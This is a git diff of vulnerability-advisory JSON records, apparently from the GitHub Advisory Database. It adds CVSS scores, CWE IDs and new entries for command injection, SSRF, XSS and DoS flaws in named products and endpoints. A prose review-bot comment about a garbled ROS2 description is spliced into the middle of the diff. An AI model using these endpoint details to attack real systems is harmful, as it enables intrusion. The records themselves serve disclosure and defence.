     "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json b/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json
index 8692daed64bd0..630ac8be1db39 100644
--- a/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json
+++ b/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json
@@ -28,7 +28,8 @@
   ],
   "database_specific": {
     "cwe_ids": [
-      "CWE-77"
+      "CWE-77",
+      "CWE-88"
     ],
     "severity": "MODERATE",
     "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json b/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json
index 21bdb3456fa83..857d19be2e86c 100644
--- a/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json
+++ b/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-v7gp-f4wc-h5w4",
-  "modified": "2024-01-22T15:30:23Z",
+  "modified": "2024-01-29T18:31:46Z",
   "published": "2024-01-22T15:30:23Z",
   "aliases": [
     "CVE-2020-36771"
   ],
   "details": "CloudLinux\n CageFS 7.1.1-1 or below passes the authentication token as command line\n argument. In some configurations this allows local users to view it via\n the process list and gain code execution as another user.\n\n\n",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -35,7 +38,7 @@
     "cwe_ids": [
       "CWE-214"
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-22T14:15:07Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-v7v5-mxj3-9qmp/GHSA-v7v5-mxj3-9qmp.json b/advisories/unreviewed/2024/01/GHSA-v7v5-mxj3-9qmp/GHSA-v7v5-mxj3-9qmp.json
new file mode 100644
index 0000000000000..1d4e372fbd943
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-v7v5-mxj3-9qmp/GHSA-v7v5-mxj3-9qmp.json
@@ -0,0 +1,43 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-v7v5-mxj3-9qmp",
+  "modified": "2024-01-29T18:31:49Z",
+  "published": "2024-01-29T18:31:49Z",
+  "aliases": [
+    "CVE-2024-23441"
+  ],
+  "details": "Vba32 Antivirus v3.36.0 is vulnerable to a Denial of Service vulnerability by triggering the 0x2220A7 IOCTL code of the Vba32m64.sys driver.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+    }
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23441"
+    },
+    {
+      "type": "WEB",
+      "url": "https://fluidattacks.com/advisories/rollins/"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.anti-virus.by/vba32"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-400",
+      "CWE-476"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-29T16:15:09Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json b/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json
index 4c82650afa025..f260054f1ce30 100644
--- a/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json
+++ b/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json
@@ -32,7 +32,7 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-79"
     ],
     "severity": "MODERATE",
     "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-v9pc-9fc9-4ff8/GHSA-v9pc-9fc9-4ff8.json b/advisories/unreviewed/2024/01/GHSA-v9pc-9fc9-4ff8/GHSA-v9pc-9fc9-4ff8.json
new file mode 100644
index 0000000000000..a27e44ae27677
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-v9pc-9fc9-4ff8/GHSA-v9pc-9fc9-4ff8.json
@@ -0,0 +1,46 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-v9pc-9fc9-4ff8",
+  "modified": "2024-01-29T00:30:17Z",
+  "published": "2024-01-29T00:30:17Z",
+  "aliases": [
+    "CVE-2024-0986"
+  ],
+  "details": "A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
+    }
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0986"
+    },
+    {
+      "type": "WEB",
+      "url": "https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link"
+    },
+    {
+      "type": "WEB",
+      "url": "https://vuldb.com/?ctiid.252251"
+    },
+    {
+      "type": "WEB",
+      "url": "https://vuldb.com/?id.252251"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-78"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-29T00:15:07Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json b/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json
index 4d93c780f1d52..75c01195fc183 100644
--- a/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json
+++ b/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vg35-f2fg-jc49",
-  "modified": "2024-01-27T09:30:35Z",
+  "modified": "2024-02-03T00:31:32Z",
   "published": "2024-01-27T09:30:35Z",
   "aliases": [
     "CVE-2024-22861"
   ],
   "details": "Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+    }
   ],
   "affected": [
 
@@ -25,9 +28,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-190"
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-27T07:15:07Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json b/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json
index 2a2fca2b24773..80540c5b97932 100644
--- a/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json
+++ b/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vh9j-8vw4-5hp6",
-  "modified": "2024-01-24T18:31:01Z",
+  "modified": "2024-01-30T21:30:28Z",
   "published": "2024-01-24T18:31:01Z",
   "aliases": [
     "CVE-2023-52040"
   ],
   "details": "An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_41284C function.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -25,9 +28,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-77"
     ],
-    "severity": null,
+    "severity": "CRITICAL",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-24T18:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json b/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json
index 5376897c620db..03c2a4b689f84 100644
--- a/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json
+++ b/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vhm4-6qm7-jwhr",
-  "modified": "2024-01-27T06:30:22Z",
+  "modified": "2024-02-01T06:31:04Z",
   "published": "2024-01-27T06:30:22Z",
   "aliases": [
     "CVE-2024-0667"
@@ -36,7 +36,7 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-352"
     ],
     "severity": "MODERATE",
     "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json b/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json
index 3617d07f80f7f..109a81ea2c5ce 100644
--- a/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json
+++ b/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vhw4-mjfv-p3gg",
-  "modified": "2024-01-23T12:30:29Z",
+  "modified": "2024-01-30T00:30:29Z",
   "published": "2024-01-23T12:30:29Z",
   "aliases": [
     "CVE-2024-23180"
   ],
   "details": "Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -31,7 +34,7 @@
     "cwe_ids": [
 
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-23T10:15:10Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json b/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json
index 148881f2c01fb..988884fa99976 100644
--- a/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json
+++ b/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json
@@ -36,6 +36,14 @@
     {
       "type": "WEB",
       "url": "https://github.com/Matroska-Org/libebml/compare/release-1.4.4...release-1.4.5"
+    },
+    {
+      "type": "WEB",
+      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BJUXVOIRWPP7OFYUKQZDNJTSLWCPIZBH/"
+    },
+    {
+      "type": "WEB",
+      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XNANFT4P6KL4WDQ3TV6QQ44NSC7WKLAB/"
     }
   ],
   "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json b/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json
index a943efe6e4925..9d6196b1de313 100644
--- a/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json
+++ b/advisories/unreviewed/2024/01/GHSA-vqj2-hm8r-26qm/GHSA-vqj2-hm8r-26qm.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vqj2-hm8r-26qm",
-  "modified": "2024-01-23T12:30:30Z",
+  "modified": "2024-01-30T00:30:29Z",
   "published": "2024-01-23T12:30:30Z",
   "aliases": [
     "CVE-2023-51043"
   ],
   "details": "In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -29,9 +32,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-416"
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-23T11:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json b/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json
index f8efe772ecffc..e3e61e8bb52c5 100644
--- a/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json
+++ b/advisories/unreviewed/2024/01/GHSA-vqxw-rw4p-r6vh/GHSA-vqxw-rw4p-r6vh.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vqxw-rw4p-r6vh",
-  "modified": "2024-01-25T15:31:53Z",
+  "modified": "2024-02-01T15:30:24Z",
   "published": "2024-01-25T15:31:53Z",
   "aliases": [
     "CVE-2024-22729"
   ],
   "details": "NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -25,9 +28,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-77"
     ],
-    "severity": null,
+    "severity": "CRITICAL",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-25T15:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json b/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json
index d32e3b142374d..f517b142d4b32 100644
--- a/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json
+++ b/advisories/unreviewed/2024/01/GHSA-vr6g-w83m-c9vg/GHSA-vr6g-w83m-c9vg.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vr6g-w83m-c9vg",
-  "modified": "2024-01-23T21:30:21Z",
+  "modified": "2024-01-29T21:30:27Z",
   "published": "2024-01-23T21:30:21Z",
   "aliases": [
     "CVE-2023-52090"
   ],
   "details": "A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -29,9 +32,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-59"
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vr97-92rp-h57c/GHSA-vr97-92rp-h57c.json b/advisories/unreviewed/2024/01/GHSA-vr97-92rp-h57c/GHSA-vr97-92rp-h57c.json
new file mode 100644
index 0000000000000..e41b9c31c3d67
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-vr97-92rp-h57c/GHSA-vr97-92rp-h57c.json
@@ -0,0 +1,38 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-vr97-92rp-h57c",
+  "modified": "2024-02-08T18:30:38Z",
+  "published": "2024-01-31T00:30:17Z",
+  "aliases": [
+    "CVE-2023-51202"
+  ],
+  "details": "OS command injection vulnerability in command processing or system call componentsROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary commands.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51202"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/16yashpatel/CVE-2023-51202"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-78"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-30T22:15:52Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-vrjf-gppf-qvj4/GHSA-vrjf-gppf-qvj4.json b/advisories/unreviewed/2024/01/GHSA-vrjf-gppf-qvj4/GHSA-vrjf-gppf-qvj4.json
new file mode 100644
index 0000000000000..cb2cbdfb4b472
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-vrjf-gppf-qvj4/GHSA-vrjf-gppf-qvj4.json
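Review bot: The `details` string of the new GHSA-vr97-92rp-h57c record reads `componentsROS2`, so the product name is fused to the preceding word and will not match a search for "ROS2" or "ROS 2"; the text appears to be mirrored verbatim from NVD (the record sits under `unreviewed/` with `"github_reviewed": false`), so the fix belongs upstream, but the garbling is worth flagging before the record is promoted. The record also ships with an empty `affected` array and a single non-vendor `WEB` reference next to the NVD link, which means the CRITICAL rating rests entirely on the NVD vector with no project advisory or fixed version to corroborate it. A reviewer promoting this record should add the affected range and a project-side reference so that downstream consumers have something actionable beyond the score.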
@@ -0,0 +1,38 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-vrjf-gppf-qvj4",
+  "modified": "2024-01-30T12:30:18Z",
+  "published": "2024-01-30T12:30:18Z",
+  "aliases": [
+    "CVE-2024-1063"
+  ],
+  "details": "Appwrite <= v1.4.13 is affected by a Server-Side Request Forgery (SSRF) via the '/v1/avatars/favicon' endpoint due to an incomplete fix of CVE-2023-27159.\n",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1063"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.tenable.com/security/research/tra-2024-03"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-918"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-30T10:15:09Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json b/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json
index de5d3e9ef3e3b..2537a07cd5d5b 100644
--- a/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json
+++ b/advisories/unreviewed/2024/01/GHSA-vrx4-754w-fhfx/GHSA-vrx4-754w-fhfx.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vrx4-754w-fhfx",
-  "modified": "2024-01-23T15:30:58Z",
+  "modified": "2024-01-30T00:30:29Z",
   "published": "2024-01-23T15:30:58Z",
   "aliases": [
     "CVE-2024-22660"
   ],
   "details": "TOTOLINK_A3700R_V9.1.2u.6165_20211012has a stack overflow vulnerability via setLanguageCfg",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -25,9 +28,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-787"
     ],
-    "severity": null,
+    "severity": "CRITICAL",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-23T15:15:11Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json b/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json
index 829766568c9d9..e20e16288fa84 100644
--- a/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json
+++ b/advisories/unreviewed/2024/01/GHSA-vvwc-xg9v-c7jf/GHSA-vvwc-xg9v-c7jf.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vvwc-xg9v-c7jf",
-  "modified": "2024-01-23T12:30:29Z",
+  "modified": "2024-01-30T00:30:29Z",
   "published": "2024-01-23T12:30:29Z",
   "aliases": [
     "CVE-2024-23181"
   ],
   "details": "Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user's web browser.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+    }
   ],
   "affected": [
 
@@ -29,9 +32,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-79"
     ],
-    "severity": null,
+    "severity": "MODERATE",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-23T10:15:10Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json b/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json
index 5568e9e8376cf..47b1cf6df7a7f 100644
--- a/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json
+++ b/advisories/unreviewed/2024/01/GHSA-vw65-ccrc-xmfw/GHSA-vw65-ccrc-xmfw.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vw65-ccrc-xmfw",
-  "modified": "2024-01-23T15:30:58Z",
+  "modified": "2024-01-30T18:30:19Z",
   "published": "2024-01-23T15:30:58Z",
   "aliases": [
     "CVE-2024-0746"
   ],
   "details": "A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+    }
   ],
   "affected": [
 
@@ -26,6 +29,10 @@
       "type": "WEB",
       "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html"
     },
+    {
+      "type": "WEB",
+      "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html"
+    },
     {
       "type": "WEB",
       "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/"
@@ -43,7 +50,7 @@
     "cwe_ids": [
 
     ],
-    "severity": null,
+    "severity": "MODERATE",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-23T14:15:38Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json b/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json
index d3034eae56fa2..d929796765c79 100644
--- a/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json
+++ b/advisories/unreviewed/2024/01/GHSA-vwg3-8x87-rfjm/GHSA-vwg3-8x87-rfjm.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vwg3-8x87-rfjm",
-  "modified": "2024-01-25T21:32:15Z",
+  "modified": "2024-01-29T18:31:48Z",
   "published": "2024-01-25T21:32:15Z",
   "aliases": [
     "CVE-2024-22638"
   ],
   "details": "liveSite v2019.1 was discovered to contain a remote code execution (RCE) vulenrabiity via the component /livesite/edit_designer_region.php.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
@@ -27,7 +30,7 @@
     "cwe_ids": [
 
     ],
-    "severity": null,
+    "severity": "CRITICAL",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-25T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vwmq-g758-4rpf/GHSA-vwmq-g758-4rpf.json b/advisories/unreviewed/2024/01/GHSA-vwmq-g758-4rpf/GHSA-vwmq-g758-4rpf.json
new file mode 100644
index 0000000000000..5158646df2ab2
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-vwmq-g758-4rpf/GHSA-vwmq-g758-4rpf.json
@@ -0,0 +1,42 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-vwmq-g758-4rpf",
+  "modified": "2024-01-30T12:30:18Z",
+  "published": "2024-01-30T12:30:18Z",
+  "aliases": [
+    "CVE-2024-1030"
+  ],
+  "details": "A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+    }
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1030"
+    },
+    {
+      "type": "WEB",
+      "url": "https://vuldb.com/?ctiid.252303"
+    },
+    {
+      "type": "WEB",
+      "url": "https://vuldb.com/?id.252303"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-30T10:15:08Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json b/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json
index 06dc568e50875..f59b34b8975fa 100644
--- a/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json
+++ b/advisories/unreviewed/2024/01/GHSA-vwwf-cxx3-3hpv/GHSA-vwwf-cxx3-3hpv.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vwwf-cxx3-3hpv",
-  "modified": "2024-01-24T21:30:33Z",
+  "modified": "2024-01-31T21:31:03Z",
   "published": "2024-01-24T21:30:33Z",
   "aliases": [
     "CVE-2021-42145"
   ],
   "details": "An assertion failure discovered in in check_certificate_request() in Contiki-NG tinyDTLS through master branch 53a0d97 allows attackers to cause a denial of service.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+    }
   ],
   "affected": [
 
@@ -25,9 +28,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-755"
